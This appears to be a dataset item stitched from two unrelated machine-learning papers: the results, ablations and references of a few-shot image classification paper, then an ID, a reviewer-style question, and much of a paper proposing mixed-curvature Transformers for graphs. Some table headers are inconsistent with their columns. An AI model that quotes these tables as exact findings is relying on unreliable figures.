| Ours | EfficientNet-B0| 74.84±0.36 | 89.84±0.30 |

Table 2: Comparison on CIFAR-FS and FC100.

| Method | Backbone | CIFAR-FS 5-way | FC100 5-way |
|-------------------------|----------|----------------|-------------|
| | | 1-shot (%) | 5-shot (%) |
| Shot-Free | ResNet-12| 69.2±n/a | 84.7±n/a |
| TEWAM | ResNet-12| 70.4±n/a | 81.3±n/a |
| Prototypical Networks | ResNet-12| 72.2±0.7 | 83.5±0.5 |
| MetaOptNet | ResNet-12| 72.6±0.7 | 84.3±0.5 |
| Rethinking | ResNet-12| 73.9±0.8 | 86.9±0.5 |
| ECS | ResNet-12| 76.8±0.8 | 89.2±0.6 |
| PAL | ResNet-12| 77.1±0.7 | 88.0±0.5 |
| DeepEMD | ResNet-12| 74.5±0.3 | 86.4±0.4 |
| Baseline | ResNet-12| 70.2±0.4 | 83.0±0.3 |
| Ours | ResNet-12| 78.1±0.4 | 89.9±0.4 |
| FewTURE | Swin-Tiny| 77.8±0.8 | 88.9±0.6 |
| HCTransformers | ViT-S | 78.9±0.2 | 90.5±0.1 |
| Baseline | EfficientNet-B0| 71.3±0.4 | 83.2±0.3 |
| Ours | EfficientNet-B0| 79.2±0.4 | 92.0±0.4 |

4.4 Ablation Study

Table 3 shows the ablation experiments on miniImageNet with ResNet12 as the backbone. MP and DPL bring a great performance improvement of 8.85% in the miniImageNet 5-way-1-shot setting compared with the DINOv2 baseline. GMIX further improves the accuracy by 1.47% (1-shot). With all the proposed strategies, we surpass the supervised baseline by 9.38% (1-shot). Fig 5 visualizes the embedding space of the dataset.
After training with our strategies, the embeddings of the validation set become more concentrated and exhibit clearer classification boundaries, indicating that our method has better generalization abilities over novel categories.

Table 3: Ablation study. The baseline is trained with SL (supervised learning); we surpass it by a large margin of 9.38% (1-shot) and 8.41% (5-shot).

| SL SSL DPL GMIX Cascading Selection | 1-shot (%) | 5-shot (%) |
|-------------------------------------|------------|------------|
| ✓ - - - - - - | 62.74±0.44 | 79.61±0.36 |
| ✓ - ✓ - - - - | 61.50±0.44 | 78.13±0.36 |
| - ✓ ✓ - - - - | 70.35±0.40 | 85.61±0.39 |
| - ✓ ✓ ✓ - - - | 71.82±0.40 | 86.57±0.37 |
| - ✓ ✓ ✓ ✓ - - | 72.12±0.40 | 88.02±0.28 |

Table 4: Comparison of the number of cascading token selection stages and SSL methods: 5-way-1-shot results (%) on miniImageNet.

| Stage of Cascade | DINO | iBOT | DINOv2 |
|------------------|------|------|--------|
| n = 1 stage | 70.51±0.38 | 71.14±0.37 | 71.82±0.40 |
| n = 2 stages | 71.22±0.41 | 71.87±0.37 | 72.12±0.40 |
| n = 3 stages | 71.16±0.38 | 71.72±0.40 | 71.78±0.39 |
| n = 4 stages | 71.02±0.39 | 71.78±0.41 | 71.89±0.40 |

**Input Resolution.** For datasets with lower resolution, such as CIFAR, the improvement in performance is not as significant. As pointed out by (He et al., 2022), patch-based methods are not effective on datasets with low resolution. To investigate the impact of resolution on performance, experiments were conducted with inputs of different resolutions, and the results are shown in Fig 6. This figure also demonstrates that merely increasing the resolution may not have positive effects for some methods, as also noted by (He et al., 2022). These experiments suggest that the improvement in performance is not solely attributable to the increase in resolution; rather, it is the robust backbone trained with our proposed stronger regularization strategies that matters most in reducing the risk of overfitting.

**Figure 6:** Comparison of different input resolutions.

**Figure 7:** Visualization of local patch token activation regions of the two models.

| Strategy | Backbone | 1-shot (%) | 5-shot (%) |
|----------------|------------|------------|------------|
| All | ResNet-12 | 71.44±0.42 | 87.64±0.31 |
| TokenSelection | ResNet-12 | 72.12±0.40 | 88.02±0.28 |

**Table 5:** Comparison of different token selection strategies on miniImageNet.

**Number of cascading stages and self-supervised methods:** The experiments in Table 4 show that all self-supervised methods give the best results when the number of stages is \( n=2 \). Moreover, among all the self-supervised methods, DINOv2 gives the best results. Therefore, DINOv2 is used in all cases where other results are not specifically mentioned.

**Token Selection Strategy.** Table 5 presents our experiments validating the design of the token selection strategy. We denote using the tokens with higher attention scores for the Direct Patch Learning loss as TokenSelection, and using all tokens as All. On the miniImageNet dataset, training with the token selection strategy demonstrates better performance. We attribute this phenomenon to the irrelevant semantic information contained in tokens from background regions.
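Before examining DPL's activation regions, note that the DPL objective of Eq. 5 is simple to state in code. A minimal sketch (our own, assuming a shared classifier head over the selected top tokens and GMIX-style soft labels):

```python
import torch
import torch.nn.functional as F

def dpl_loss(patch_tokens, classifier, soft_labels):
    """Direct Patch Learning loss (Eq. 5): each selected foreground token
    t_i is pushed through a shared classifier and trained against the
    (possibly GMIX-softened) label on its own, i.e. n weak classifiers.
    patch_tokens: (batch, n_top, dim); soft_labels: (batch, n_classes)."""
    b, n, d = patch_tokens.shape
    logits = classifier(patch_tokens.reshape(b * n, d))          # p(y | t_i)
    log_probs = F.log_softmax(logits, dim=-1).reshape(b, n, -1)
    # cross-entropy against soft labels, averaged over the n weak classifiers
    return -(soft_labels.unsqueeze(1) * log_probs).sum(-1).mean()
```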
**Activation Region of Direct Patch Learning.** It is observed that the model trained using DPL exhibits larger activation regions for local patch tokens. The receptive field of a deep neural network is theoretically large enough to cover the entire input space. Therefore, using image-level features, such as globally pooled features in a CNN or the \([cls]\) token in a ViT, is adequate to activate the object's entire region, and local tokens are only required to activate their respective local areas. Moreover, directly using global features for training may not benefit generalization to new classes, because the model may focus mainly on the features most significant for the base classes; when facing novel classes, these features may not be discriminative enough. Through Direct Patch Learning, the model learns the different features of one sample more independently. This approach helps avoid overfitting to the base classes by learning a more varied set of features.

## 5 Conclusions

This paper introduces a cascading learning framework for few-shot learning that divides the learning process patch-wise using token selection. The goal is to enhance the representational capacity of tokens and better leverage the knowledge available from limited data. Our approach demonstrates strong performance with a minimal increase in computational cost. Furthermore, the GMIX module and the patch-wise strategy can be easily integrated into other tasks as plug-and-play modules. Overall, both the insight about non-annotated parts and the cascading patch-wise learning strategy are enlightening to the community.

REFERENCES

Arman Afrasiyabi, Hugo Larochelle, Jean-François Lalonde, and Christian Gagné. Matching feature sets for few-shot image classification. In Proceedings of the IEEE/CVF Conference on Computer Vision and Pattern Recognition, pp. 9014–9024, 2022.

Luca Bertinetto, Joao F Henriques, Philip HS Torr, and Andrea Vedaldi. Meta-learning with differentiable closed-form solvers. arXiv preprint arXiv:1805.08136, 2018.

Mathilde Caron, Hugo Touvron, Ishan Misra, Hervé Jégou, Julien Mairal, Piotr Bojanowski, and Armand Joulin. Emerging properties in self-supervised vision transformers. In Proceedings of the International Conference on Computer Vision (ICCV), 2021.

Wei-Yu Chen, Yen-Cheng Liu, Zsolt Kira, Yu-Chiang Frank Wang, and Jia-Bin Huang. A closer look at few-shot classification. arXiv preprint arXiv:1904.04232, 2019.

Yinbo Chen, Zhuang Liu, Huijuan Xu, Trevor Darrell, and Xiaolong Wang. Meta-baseline: Exploring simple meta-learning for few-shot learning. In Proceedings of the IEEE/CVF International Conference on Computer Vision, pp. 9062–9071, 2021.

Jia Deng, Wei Dong, Richard Socher, Li-Jia Li, Kai Li, and Li Fei-Fei. Imagenet: A large-scale hierarchical image database. In 2009 IEEE Conference on Computer Vision and Pattern Recognition, pp. 248–255. IEEE, 2009.

Guneet S Dhillon, Pratik Chaudhari, Avinash Ravichandran, and Stefano Soatto. A baseline for few-shot image classification. arXiv preprint arXiv:1909.02729, 2019.

Chelsea Finn, Pieter Abbeel, and Sergey Levine. Model-agnostic meta-learning for fast adaptation of deep networks. In International Conference on Machine Learning, pp. 1126–1135. PMLR, 2017.

Spyros Gidaris, Andrei Bursuc, Nikos Komodakis, Patrick Pérez, and Matthieu Cord. Boosting few-shot visual learning with self-supervision. In Proceedings of the IEEE International Conference on Computer Vision, 2019.

Fusheng Hao, Fengxiang He, Jun Cheng, Lei Wang, Jianzhong Cao, and Dacheng Tao. Collect and select: Semantic alignment metric learning for few-shot learning. In Proceedings of the IEEE/CVF International Conference on Computer Vision, pp. 8460–8469, 2019.
Yangji He, Weihan Liang, Dongyang Zhao, Hong-Yu Zhou, Weifeng Ge, Yizhou Yu, and Wenqiang Zhang. Attribute surrogates learning and spectral tokens pooling in transformers for few-shot learning. In Proceedings of the IEEE/CVF Conference on Computer Vision and Pattern Recognition, pp. 9119–9129, June 2022. Markus Hiller, Rongkai Ma, Mehrtash Harandi, and Tom Drummond. Rethinking generalization in few-shot classification. arXiv preprint arXiv:2206.07267, 2022. Hongwei Huang, Zhangkai Wu, Wenbin Li, Jing Huo, and Yang Gao. Local descriptor-based multi-prototype network for few-shot learning. Pattern Recognition, 116:107935, 2021. ISSN 0031-3203. Muhammad Abdullah Jamal and Guo-Jun Qi. Task agnostic meta-learning for few-shot learning. In Proceedings of the IEEE/CVF Conference on Computer Vision and Pattern Recognition, pp. 11719–11727, 2019. Adam Jelley, Amos Storkey, Antreas Antoniou, and Sam Devlin. Contrastive meta-learning for partially observable few-shot learning. In The Eleventh International Conference on Learning Representations, 2022. Gregory Koch, Richard Zemel, Ruslan Salakhutdinov, et al. Siamese neural networks for one-shot image recognition. In ICML deep learning workshop, volume 2, pp. 0. Lille, 2015. Jinxiang Lai, Siqian Yang, Guannan Jiang, Xi Wang, Yuxi Li, Zihui Jia, Xiaochen Chen, Jun Liu, Bin-Bin Gao, Wei Zhang, et al. Rethinking the metric in few-shot learning: From an adaptive multi-distance perspective. In Proceedings of the 30th ACM International Conference on Multimedia, pp. 4021–4030, 2022.
AN5uo4ByWH
You claim Euclidean Transformers are inadequate for modeling hierarchical and cyclic graphs. However, recent works like Graphormer show strong performance on tasks like molecular property prediction that involve such structures. Can you provide more concrete evidence on the limitations of existing methods? Comparisons to recent graph Transformers on suitable benchmarks would help make this case.
Curve Your Attention: Mixed-Curvature Transformers for Graph Representation Learning

Anonymous authors
Paper under double-blind review

Abstract

Real-world graphs naturally exhibit hierarchical trees and cyclic structures that are unfit for the typical Euclidean space. While there exist graph neural networks that utilize hyperbolic or spherical spaces towards embedding such structures more accurately, these methods are confined to the message-passing paradigm, making them vulnerable to side-effects such as oversmoothing and oversquashing. More recent works have proposed global attention-based graph Transformers that can alleviate such drawbacks and easily model long-range interactions, but their extensions towards non-Euclidean geometry remain unexplored. To bridge this gap, we propose the Fully Product-Stereographic Transformer, a generalization of Transformers towards operating entirely on the product of constant curvature spaces. When combined with tokenized graph Transformers, our model can learn the curvature appropriate for the input graph in an end-to-end fashion, without any additional tuning over different curvature initializations. We also provide a kernelized approach to non-Euclidean attention, which enables our model to run with computational cost linear in the number of nodes and edges while respecting the underlying geometry. Experiments on graph reconstruction and node classification demonstrate the benefits of generalizing Transformers to the non-Euclidean domain.

1 Introduction

Learning from graph-structured data is a challenging task in machine learning, with various downstream applications that involve modeling individual entities and the relational interactions among them (Sen et al., 2008; Watts & Strogatz, 1998; Gleich et al., 2004). A dominant line of work consists of graph convolutional networks (GCNs) that aggregate features across graph neighbors through message-passing (Gilmer et al., 2017; Kipf & Welling, 2016; Veličković et al., 2017; Wu et al., 2019; Hamilton et al., 2017). While most GCNs learn features that lie in the typical Euclidean space with zero curvature, real-world graphs often comprise complex structures such as hierarchical trees and cycles, which Euclidean space requires excessive dimensions to embed accurately (Sala et al., 2018). In response, the graph learning community has developed generalizations of GCNs to spaces with non-zero curvature, such as hyperbolic, spherical, or mixed-curvature spaces with both negative and positive curvatures (Chami et al., 2019; Liu et al., 2019; Bachmann et al., 2020; Xiong et al., 2022). Unfortunately, non-Euclidean GCNs are not immune to the harmful side-effects of message-passing, such as oversmoothing (Oono & Suzuki, 2019; Cai & Wang, 2020; Yang et al., 2022) and oversquashing (Topping et al., 2021; Alon & Yahav, 2020). These drawbacks make it difficult to stack GCN layers to large depths, limiting their expressive power (Feng et al., 2022; Maron et al., 2019) as well as their predictive performance on tasks that require long-range interactions (Dwivedi et al., 2022; Liu et al., 2021). To cope with such limitations, recent works have instead proposed Transformer-based graph encoders that can easily exchange information across long-range distances through global self-attention (Kim et al., 2022; Ying et al., 2021; Dwivedi & Bresson, 2020; Kreuzer et al., 2021).
However, existing graph Transformers are still confined within the Euclidean regime, and their extensions towards non-Euclidean geometry have not yet been studied. In this paper, we bridge this gap by generalizing the Transformer architecture (Vaswani et al., 2017) towards non-Euclidean spaces with learnable curvatures. Specifically, we endow each attention head with a stereographic model (Bachmann et al., 2020) that can universally represent Euclidean, hyperbolic, and spherical geometry.

Figure 1: Illustration of our proposed FPS-T architecture. Well-known constant-curvature spaces can be projected to the stereographic model, with a common chart map isomorphic to the $d$-dimensional Euclidean space. Each space can efficiently embed different types of graphs (e.g., trees in hyperbolic space, lines in Euclidean space, and cycles in spherical space). In FPS-T, each layer chooses a set of curvatures that fits the input graph by changing the sign of the curvature $\kappa$ in a differentiable manner.

We generalize each operation of the Transformer architecture to inputs on the product-stereographic model, all of which are end-to-end differentiable with respect to the curvatures, thereby allowing the model to jointly train embeddings as well as the underlying curvature. The resulting model, which we name the Fully Product-Stereographic Transformer (FPS-T), takes advantage of both non-Euclidean geometry and long-range interactions. We empirically show that the learnable sectional curvature of FPS-T successfully converges to the geometry of the input graph, leading to better predictive performance and parameter efficiency in graph reconstruction and node classification compared to its Euclidean counterpart. To the best of our knowledge, our work is the first to propose a natural generalization of Transformers to mixed-curvature spaces. We summarize our core contributions as follows:

- We propose FPS-T, a generalization of the Transformer towards operating entirely on the product-stereographic model with curvatures that are learnable in an end-to-end fashion.
- For graph representation learning, we integrate FPS-T with the Tokenized Graph Transformer (Kim et al., 2022), and develop a kernelized approximation of non-Euclidean attention to reduce the computational cost to linear in the number of nodes and edges.
- Graph reconstruction and node classification experiments on synthetic as well as real-world graphs demonstrate the benefit of generalizing Transformers to the mixed-curvature domain.

2 RELATED WORK

**Non-Euclidean graph representations.** Non-Euclidean spaces are known to well-preserve specific types of graph structure where Euclidean space fails. In particular, non-Euclidean spaces with constant sectional curvature, e.g., hyperbolic and spherical spaces, are widely used in graph representation learning due to their tractable operations. Hyperbolic spaces are capable of efficiently embedding complex hierarchical structures in graphs (Nickel & Kiela, 2018; 2017; Ganea et al., 2018; Krioukov et al., 2010; Sala et al., 2018). Graphs with cyclic structures are well-suited for spherical spaces (Wilson et al., 2014; Grattarola et al., 2019). Riemannian manifolds with varying curvature and constant sign have also been proposed for graph encoding (Cruceru et al., 2021). However, Riemannian manifolds where the sign of the curvature is fixed are not a good choice for more complex graphs that exhibit both hierarchy and cycles.
Instead, the product of constant-curvature spaces (Gu et al., 2019), heterogeneous manifolds (Giovanni et al., 2022), and pseudo-Riemannian manifolds (Law & Stam, 2020) have been found to be well-suited for learning representations of such complex graphs. Message-passing GCNs also benefit from considering a non-Euclidean representation space. Hyperbolic GCNs are known to outperform their Euclidean counterparts in various tasks on hierarchical graphs such as citation networks (Chami et al., 2019; Zhang et al., 2021; Pei et al., 2020) and molecules (Chami et al., 2019; Liu et al., 2019). DeepSphere (Defferrard et al., 2020) adapted GCNs to the spherical space, with applications such as 3D object and earth climate modeling. To take advantage of multiple spaces, Zhu et al. (2020b) proposed a hybrid architecture that fuses Euclidean and hyperbolic graph representations together. Deng et al. (2023) similarly proposed modeling interactions between three constant-curvature spaces (i.e., Euclidean, hyperbolic, and spherical). To allow smooth transitions between the three constant-curvature spaces, Bachmann et al. (2020) proposed a model of constant-curvature space called the stereographic model, on which geometric operations such as distances and inner products are differentiable at all curvature values including zero. Incorporating pseudo-Riemannian manifolds into the GCN architecture has also shown promising results (Xiong et al., 2022), but its performance is sensitive to the time dimension of the manifold, which requires extensive hyperparameter tuning. Overall, GCNs achieve great predictive performance on homophilic graphs where connected nodes share the same features, but they tend to fail on heterophilic graphs, as stacking up GCN layers to capture message passing between distant nodes induces oversmoothing (Oono & Suzuki, 2019; Cai & Wang, 2020) and oversquashing (Topping et al., 2021). To relieve this architectural limitation while utilizing non-Euclidean geometric priors, we instead develop a Transformer-based graph encoder that operates on the stereographic model to learn graph representations.

**Graph Transformers.** Inspired by the huge success of Transformers in NLP and CV (Devlin et al., 2018; Brown et al., 2020; Dosovitskiy et al., 2020), various works have extended Transformers to encoding graphs whose edge connectivities are neither sequential nor grid-like. Graph Transformer (Dwivedi & Bresson, 2020) and Spectral Attention Network (Kreuzer et al., 2021) were the first pioneers to explore this direction by replacing the sinusoidal positional encodings widely used in NLP with Laplacian eigenvectors of the input graph. Graphormer (Ying et al., 2021) then proposed utilizing edge connectivities by using shortest-path distances as an attention bias, showing state-of-the-art performance on molecular property prediction. TokenGT (Kim et al., 2022) proposed a tokenization technique that views each graph as a sequence of nodes and edges. Unlike other methods, TokenGT allows straightforward integration of engineering techniques for pure Transformers such as linearized attention (Katharopoulos et al., 2020), while enjoying theoretical expressivity that surpasses that of message-passing GCNs. However, existing graph Transformer architectures are still confined within the Euclidean domain, making them unable to precisely embed graphs onto the feature space in the way geometric GCNs can.
While the Hyperbolic Attention Network (Gulcehre et al., 2018) proposed an attention mechanism that operates on hyperbolic space, its distance-based approach imposes a computational cost quadratic in the graph size, and its geometry is fixed to hyperbolic. Instead, we generalize the representation space of the Transformer to the stereographic model, which allows us to cover more various types of graphs. We also linearize the attention mechanism on the stereographic model similarly to Katharopoulos et al. (2020), which results in a model that runs in cost linear in the number of nodes and edges.

3 Preliminaries

In this section, we introduce concepts related to our main geometrical tool, the product-stereographic model (Bachmann et al., 2020). We also discuss multi-head attention, the driving force of the Transformer architecture (Vaswani et al., 2017).

3.1 Product-Stereographic Model

**Riemannian manifolds.** A Riemannian manifold consists of a smooth manifold \( M \) and a metric tensor \( g \). Each point \( x \) on the manifold \( M \) defines a tangent space \( T_xM \), the collection of all tangent vectors at \( x \). The metric tensor \( g : M \rightarrow \mathbb{R}^{n \times n} \) assigns a positive-definite matrix to each point \( x \), which defines the inner product \( \langle \cdot , \cdot \rangle_x : T_xM \times T_xM \rightarrow \mathbb{R} \) as \( v_1^\top g(x) v_2 \), where \( v_1, v_2 \in T_xM \) are tangent vectors at \( x \). The metric tensor also defines geometrical properties and operations on the Riemannian manifold. A geodesic \( \gamma \) is the shortest curve between two points \( x, y \in M \), and its length gives the distance \( d_M(x, y) = \int_0^1 \sqrt{\langle \dot{\gamma}(t), \dot{\gamma}(t) \rangle_{\gamma(t)}} \, dt \), where \( \gamma : [0, 1] \rightarrow M \) is a unit-speed curve satisfying \( \gamma(0) = x \) and \( \gamma(1) = y \). We can move the point \( x \in M \) along a tangent vector \( v \in T_xM \) using the exponential map \( \exp_x : T_xM \rightarrow M \), defined as \( \exp_x(v) = \gamma(1) \), where \( \gamma \) is a geodesic with \( \gamma(0) = x \) and \( \gamma'(0) = v \). The logarithmic map \( \log_x : M \rightarrow T_xM \) is the inverse of \( \exp_x \). A tangent vector \( v \in T_xM \) can be transferred along a geodesic from \( x \) to \( y \) using parallel transport \( \text{PT}_{x \rightarrow y} : T_xM \rightarrow T_yM \). Note that the product of Riemannian manifolds is also a Riemannian manifold. A point on the product Riemannian manifold \( x \in \otimes_{i=1}^{n} M_i \) consists of points from each component manifold \( M_i \), written \( x = \Vert_{i=1}^{n} x_i \), where \( x_i \in M_i \) and \( \Vert \) denotes concatenation. The distance between \( x, y \in \otimes_{i=1}^{n} M_i \) is calculated as \( \sqrt{\sum_{i=1}^{n} d_{M_i}(x_i, y_i)^2} \). Exponential/logarithmic maps and parallel transports are applied in a manifold-wise fashion (e.g., \( \exp_x(v) = \Vert_{i=1}^{n} \exp_{x_i}(v_i) \) with \( v = \Vert_{i=1}^{n} v_i \) and \( v_i \in T_{x_i} M_i \)).

**Constant-curvature spaces.** Curvature is an important geometrical property used to characterize Riemannian manifolds.
One widely-used curvature for characterizing Riemannian manifolds is the sectional curvature: given two linearly independent tangent vector fields \( U, V \in \mathfrak{X}(M) \), the sectional curvature \( K(U, V) \) is computed as \( K(U, V) = \frac{\langle R(U,V)V,U \rangle}{\langle U,U \rangle \langle V,V \rangle - \langle U,V \rangle^2} \), where \( R(\cdot, \cdot) : \mathfrak{X}(M) \times \mathfrak{X}(M) \times \mathfrak{X}(M) \to \mathfrak{X}(M) \) is the Riemannian curvature tensor. The sectional curvature measures the divergence between geodesics starting with the tangent vector fields \( U, V \) at each point of the manifold. With positive or negative sectional curvature, geodesics become closer or farther apart than with zero curvature. Throughout this paper, we refer to a space of constant sectional curvature as a **constant-curvature space**. For example, Euclidean space \( \mathbb{E} \) is the special case of a constant-curvature space with zero curvature. When the curvature is negative or positive, we call the corresponding space hyperbolic \( \mathbb{H} \) or spherical \( \mathbb{S} \), respectively.

**Stereographic models.** A \( d \)-dimensional stereographic model \( \mathfrak{st}_d^\kappa \) is a constant-curvature space with curvature \( \kappa \in \mathbb{R} \). One attractive property of the stereographic model is that operations such as distances, exp/log-maps, and parallel transport are differentiable at any curvature value \( \kappa \), including \( \kappa = 0 \). This enables the stereographic model to learn the curvature value \( \kappa \) without any constraint. The manifold of the stereographic model \( \mathfrak{st}_d^\kappa \) is \( \{ x \in \mathbb{R}^d \mid -\kappa \|x\|^2 < 1 \} \). The metric tensor is defined as \( g^\kappa(x) = \frac{4}{(1 + \kappa \|x\|^2)^2} I = (\lambda_x^\kappa)^2 I \), where \( \lambda_x^\kappa \) is known as the conformal factor. The Möbius addition between two points \( x, y \in \mathfrak{st}_d^\kappa \) is computed as \( x \oplus_\kappa y = \frac{(1-2\kappa x^\top y-\kappa \|y\|^2)x+(1+\kappa \|x\|^2)y}{1-2\kappa x^\top y+\kappa^2 \|x\|^2 \|y\|^2} \). Based on Möbius addition, we can derive the other geometric operations given in Table 3 of Appendix A. The table also shows that as \( \kappa \) converges to zero, the operations become equivalent to their Euclidean counterparts, so the stereographic model essentially recovers Euclidean geometry.

3.2 Multi-Head Attention

In the vanilla Transformer (Vaswani et al., 2017), each block consists of multiple attention heads, each taking a sequence of token embeddings \( X \in \mathbb{R}^{n \times d} \) with sequence length \( n \) and feature dimension \( d \) as input. Three linear layers \( W^Q, W^K, W^V \in \mathbb{R}^{d \times d'} \) first map each token embedding into queries \( Q \), keys \( K \), and values \( V \) with head dimension \( d' \), respectively. Then, the attention score matrix is computed by the scaled Euclidean dot-product between \( Q \) and \( K \), followed by a row-wise softmax activation \( \sigma(\cdot) \). The attention score matrix is then multiplied with the values \( V \), returning contextualized token embeddings. The overall procedure can be written as

\[
Q = XW^Q, \quad K = XW^K, \quad V = XW^V, \quad \text{Attn}(X) = \sigma \left( \frac{QK^\top}{\sqrt{d'}} \right) V. \tag{1}
\]

The outputs from the multiple attention heads are concatenated together, then processed through a feed-forward layer before proceeding to the next Transformer block.
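To make these preliminaries concrete, the following is a minimal PyTorch sketch of the core κ-stereographic primitives (the curvature-dependent tangent $\tan_\kappa$, Möbius addition, exp/log maps at the origin, and geodesic distance). This is our illustrative sketch, not the authors' implementation; in particular, the explicit branching on the sign of κ is a simplification of the fully differentiable unified treatment in Bachmann et al. (2020).

```python
import torch

def tan_k(u, kappa, eps=1e-6):
    # tan_kappa: tan for kappa > 0, tanh for kappa < 0, identity near kappa = 0.
    if kappa > eps:
        sk = kappa ** 0.5
        return torch.tan(sk * u) / sk
    if kappa < -eps:
        sk = (-kappa) ** 0.5
        return torch.tanh(sk * u) / sk
    return u

def arctan_k(u, kappa, eps=1e-6):
    # Inverse of tan_k.
    if kappa > eps:
        sk = kappa ** 0.5
        return torch.atan(sk * u) / sk
    if kappa < -eps:
        sk = (-kappa) ** 0.5
        return torch.atanh((sk * u).clamp(-1 + eps, 1 - eps)) / sk
    return u

def mobius_add(x, y, kappa):
    # Möbius addition x ⊕_κ y on the kappa-stereographic model (Section 3.1).
    xy = (x * y).sum(-1, keepdim=True)
    x2 = x.pow(2).sum(-1, keepdim=True)
    y2 = y.pow(2).sum(-1, keepdim=True)
    num = (1 - 2 * kappa * xy - kappa * y2) * x + (1 + kappa * x2) * y
    den = 1 - 2 * kappa * xy + kappa ** 2 * x2 * y2
    return num / den

def exp0(v, kappa, eps=1e-6):
    # Exponential map at the origin: tangent vector -> manifold point.
    n = v.norm(dim=-1, keepdim=True).clamp_min(eps)
    return tan_k(n, kappa) * v / n

def log0(x, kappa, eps=1e-6):
    # Logarithmic map at the origin: manifold point -> tangent vector.
    n = x.norm(dim=-1, keepdim=True).clamp_min(eps)
    return arctan_k(n, kappa) * x / n

def dist(x, y, kappa):
    # Geodesic distance: d_kappa(x, y) = 2 * arctan_k(||(-x) ⊕_κ y||).
    return 2 * arctan_k(mobius_add(-x, y, kappa).norm(dim=-1), kappa)
```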
4 Fully Product-Stereographic Transformer

Here, we describe the inner workings of our proposed method. We generalize each operation in the Transformer to the product-stereographic model, together forming a geometric Transformer architecture that operates entirely within the stereographic model.

4.1 Stereographic Neural Networks

We first introduce the stereographic analogues of Euclidean neural-network components such as the linear layer, activation, layer normalization, and logit functions. We denote the product-stereographic model \( \otimes_{i=1}^{H} \mathfrak{st}_{d_i}^{\kappa_i} \) as \( \mathfrak{st}_d^{\otimes \kappa} \), where \( \kappa = (\kappa_1, \ldots, \kappa_H) \) is the ordered set of curvatures of the component spaces within a Transformer block with \( H \) attention heads. We also use the superscript \( \otimes \kappa \) to denote Riemannian operations on the product-stereographic model that decompose representations into equal parts, apply the operation, then concatenate back to the product space (e.g., if \( v = [v_1, \ldots, v_H] \), then \( \exp_0^{\otimes \kappa}(v) := \Vert_{i=1}^{H} \exp_0^{\kappa_i}(v_i) \)).

Figure 2: Illustration of our attention mechanism on the non-Euclidean space. FPS-T considers each value vector as a point that resides on the stereographic model, and query/key vectors as tangent vectors on the corresponding tangent spaces. All query/key vectors are parallel-transported to the origin prior to dot-product attention, thereby taking the given geometry into account.

**Stereographic linear layer, activation, and layer normalization.** Given a Euclidean neural network \( f \), we can define its stereographic counterpart as \( \exp_0^{\otimes \kappa} (f(\log_0^{\otimes \kappa}(X))) \). The stereographic linear layer \( \text{Linear}_{\kappa}(X; W) \) is thus defined by setting \( f \) to the Euclidean linear layer \( f(X; W) = XW \). The same approach can be used for any Euclidean activation function \( f_{\text{act}} \) (e.g., ReLU, Tanh, ELU, and Sigmoid), from which we obtain stereographic activation functions. Stereographic layer normalization \( \text{LN}_{\kappa} \) is defined in the same manner.

**Stereographic logits.** Suppose that \( x \in \mathfrak{st}_d^\kappa \) is a stereographic embedding retrieved from the last Transformer layer. For prediction tasks such as node classification, we need to compute the probability that the node with embedding \( x \) belongs to class \( c \). Inspired by logistic regression in Euclidean space, Bachmann et al. (2020) propose its stereographic variant as

\[
p(y = c \mid x) \propto \exp \left( \text{sign}(\langle -p_c \oplus_\kappa x, a_c \rangle) \|a_c\|_{p_c} d_\kappa(x, H_{a_c, p_c}) \right), \tag{2}
\]

where \( H_{a_c, p_c} = \{ x \in \mathfrak{st}_d^\kappa \mid \langle -p_c \oplus_\kappa x, a_c \rangle = 0 \} \) is the hyperplane defined by \( a_c \in T_{p_c} \mathfrak{st}_d^\kappa \) and \( p_c \in \mathfrak{st}_d^\kappa \). For the stereographic model \( \mathfrak{st}_d^\kappa \), the distance between \( x \in \mathfrak{st}_d^\kappa \) and the hyperplane \( H_{a, p} \) equals

\[
d_\kappa(x, H_{a, p}) = \sin^{-1}_\kappa \left( \frac{2|\langle -p \oplus_\kappa x, a \rangle|}{(1 + \kappa \|{-p} \oplus_\kappa x\|^2)\|a\|} \right). \tag{3}
\]

This distance function can be easily extended to the product-stereographic model as mentioned in Section 3.1, and the parameters \( a, p \) that define the hyperplane are learnable during training.
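As a small illustration of the exp-log sandwich construction above, a stereographic linear layer might be sketched as follows, reusing `exp0` and `log0` from the earlier snippet. A single component space is shown for brevity (the product case applies this per component), and the class name is ours, not the paper's.

```python
import torch

class StereographicLinear(torch.nn.Module):
    """exp0(W @ log0(x)): a Euclidean linear map sandwiched between log/exp maps."""
    def __init__(self, d_in, d_out, kappa_init=0.0):
        super().__init__()
        self.lin = torch.nn.Linear(d_in, d_out, bias=False)
        # Learnable curvature, initialized at zero (Euclidean), as in the paper.
        self.kappa = torch.nn.Parameter(torch.tensor(kappa_init))

    def forward(self, x):
        # Pull the point to the tangent space at the origin, apply the Euclidean
        # map, then push the result back onto the manifold.
        return exp0(self.lin(log0(x, self.kappa)), self.kappa)
```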
4.2 STEREOGRAPHIC MULTI-HEAD ATTENTION

Using the stereographic operations above, we propose a multi-head attention mechanism under product-stereographic models. The key intuition is that the \( h \)-th attention head operates on the \( \kappa_h \)-stereographic space. Given a sequence of \( n \) product-stereographic embeddings \( X \in \mathfrak{st}_{\otimes \kappa}^{n \times d} \), the attention head with curvature \( \kappa \) first obtains values using the stereographic linear layer. For queries and keys, it maps each stereographic embedding to the tangent spaces of the values:

\[
Q = XW_Q \in T_V \mathfrak{st}_\kappa^{n \times d'}, \quad K = XW_K \in T_V \mathfrak{st}_\kappa^{n \times d'}, \quad V = \text{Linear}_\kappa(X; W_V) \in \mathfrak{st}_\kappa^{n \times d'}, \tag{4}
\]

where \( W_Q, W_K \in \mathbb{R}^{d \times d'} \) are the query/key weight matrices, and \( W_V \in \mathbb{R}^{d \times d'} \) is the weight matrix for the values. Then, the attention score between the \( i \)-th query \( Q_i \) and the \( j \)-th key \( K_j \) is computed by parallel-transporting the vectors to the origin and taking the inner product at the origin:

\[
\alpha_{ij} = \langle \text{PT}_{V_i \to 0}(Q_i), \text{PT}_{V_j \to 0}(K_j) \rangle_0. \tag{5}
\]

Figure 2 illustrates our geometric attention mechanism. Because the metric tensor at the origin of the stereographic model is simply \( 4I \) with identity matrix \( I \), the Riemannian inner product at the origin is equivalent to the Euclidean inner product up to a constant scaling. Finally, we aggregate the values based on the attention scores using the Einstein midpoint:

\[
\text{Aggregate}_\kappa(V, \alpha)_i := \frac{1}{2} \otimes_\kappa \left( \sum_{j=1}^n \frac{\alpha_{ij} \lambda_{V_j}^\kappa}{\sum_{k=1}^n \alpha_{ik} (\lambda_{V_k}^\kappa - 1)} V_j \right), \tag{6}
\]

